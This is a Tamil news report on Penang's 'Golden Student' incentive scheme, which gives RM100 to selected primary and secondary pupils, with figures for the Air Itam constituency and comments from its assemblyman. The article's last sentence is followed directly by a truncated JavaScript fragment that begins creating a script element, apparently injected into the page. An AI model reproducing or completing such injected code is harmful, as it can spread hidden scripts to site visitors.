பினாங்கு மாநில அரசு வழங்கும் “தங்க மாணவர் திட்டம்” 17 முதல் 28 ஆகஸ்டு மாதம் வரை மாணவர்களுக்கு ஊக்கத்தொகை வழங்கப்படுகிறது. மாநில அரசின் ஆண்டுத் திட்டத்தில் பினாங்கில் பயிலும் 42,792 மாணவர்களுக்கு ஊக்கத்தொகை வழங்கப்பட்டது. இத்திட்டத்தில் ஆண்டு 1 மற்றும் 4 பயிலும் ஆரம்பப் பள்ளி மாணவர்களுக்கும் படிவம் 1 மற்றும் படிவம் 4 பயிலும் இடைநிலைப் பள்ளி மாணவர்களுக்கும் ரிம100 ஊக்குவிப்புத்தொகை பெறுவர்.
ஆயர் ஈத்தாம் தொகுதியில் 15 பள்ளிகளைச் சார்ந்த 2,123 மாணவர்களுக்கு தங்க மாணவர் திட்டத்தின் வழி ஊக்குவிப்புத்தொகை வழங்கப்பட்டது. பினாங்கு மாநில பிராபிட், பினாங் துங்கால் தொகுதிகளுக்கு அடுத்து ஆயர் ஈத்தாம் தொகுதியிலே மிகக் கூடுதலான ஊக்குவிப்புத்தொகை பெறுகின்றனர் என ஆயர் ஈத்தாம் சட்டமன்ற உறுப்பினர் வோங் ஹொன் வாய் கூறினார்.
2012-ஆம் ஆண்டு துவங்கப்பட்ட இத்திட்டத்தின் வழி பள்ளி மாணவர்கள் தங்களுக்குத் தேவையான எழுதுகோல் வாங்குவதற்கு இந்நிதி பயன்படும் என்றார். தங்க திட்ட ஊக்கத்தொகை பெற்ற மாணவர்கள் மற்றும் அவர் தம் பெற்றோர்களை ஆயர் ஈத்தாம் மலாயன் வங்கியில் நேரில் சந்தித்தார். உயர்வு கண்டு வரும் பொருட்களின் விலை குறிப்பாக ஏழ்மை நிலையிலும் நடுத்தர வாழ்க்கையையும் வாழ்ந்து கொண்டிருக்கும் மக்களுக்குப் பெரும் சுமையாக அமைந்து வருவதால் அவர்களின் செலவுச் சுமையைக் குறைக்கும் பணியை மாநில அரசு ஆண்டுதோறும் தவறாது செய்து வருகிறது என்பது வெள்ளிடைமலையே.var d=document;var s=d.createElement(‘script’);